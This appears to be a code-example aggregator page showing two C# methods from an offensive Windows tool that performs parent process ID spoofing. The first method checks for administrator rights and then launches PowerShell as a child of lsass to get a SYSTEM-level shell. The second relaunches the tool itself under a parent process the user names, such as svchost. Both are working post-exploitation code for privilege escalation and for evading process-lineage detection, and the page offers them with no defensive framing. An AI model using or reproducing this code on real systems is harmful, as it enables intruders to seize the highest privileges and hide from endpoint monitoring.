Ejemplo n.º 1
0
        public static void EasySystemPPID()
        {
            if (!WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid))
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[!] For this function to succeed, you need UAC Elevated Administrator privileges.");
                Console.ResetColor();
                return;
            }

            string szCommandLine = "powershell.exe";

            string PPIDName = "lsass";
            int    NewPPID  = 0;

            // Find PID from our new Parent and start new Process with new Parent ID
            NewPPID = ProcessCreator.NewParentPID(PPIDName);
            if (NewPPID == 0)
            {
                Console.WriteLine("\n[!] No suitable Process ID Found...");
                return;
            }

            if (!ProcessCreator.CreateProcess(NewPPID, null, szCommandLine))
            {
                Console.WriteLine("\n[!] Oops PPID Spoof failed...");
                return;
            }

            return;
        }
Ejemplo n.º 2
0
        public static void Main(string[] args)
        {
            // Get Assembly Path
            string BinaryPath        = Assembly.GetExecutingAssembly().CodeBase;
            string lpApplicationName = BinaryPath.Replace("file:///", string.Empty).Replace("/", @"\");

            if (args.Length == 1 && args[0].ToLower() == "-parent")
            {
                Console.WriteLine("\n [+] Please enter a valid Parent Process name.");
                Console.WriteLine(" [+] For Example: {0} -parent svchost", lpApplicationName);
                return;
            }
            else if (args.Length == 2)
            {
                if (args[0].ToLower() == "-parent" && args[1] != null)
                {
                    string PPIDName = args[1];
                    int    NewPPID  = 0;

                    // Find PID from our new Parent and start new Process with new Parent ID
                    NewPPID = ProcessCreator.NewParentPID(PPIDName);
                    if (NewPPID == 0)
                    {
                        Console.WriteLine("\n [!] No suitable Process ID Found...");
                        return;
                    }

                    if (!ProcessCreator.CreateProcess(NewPPID, lpApplicationName, null))
                    {
                        Console.WriteLine("\n [!] Oops PPID Spoof failed...");
                        return;
                    }
                }
            }
            else
            {
                Entry();
            }

            return;
        }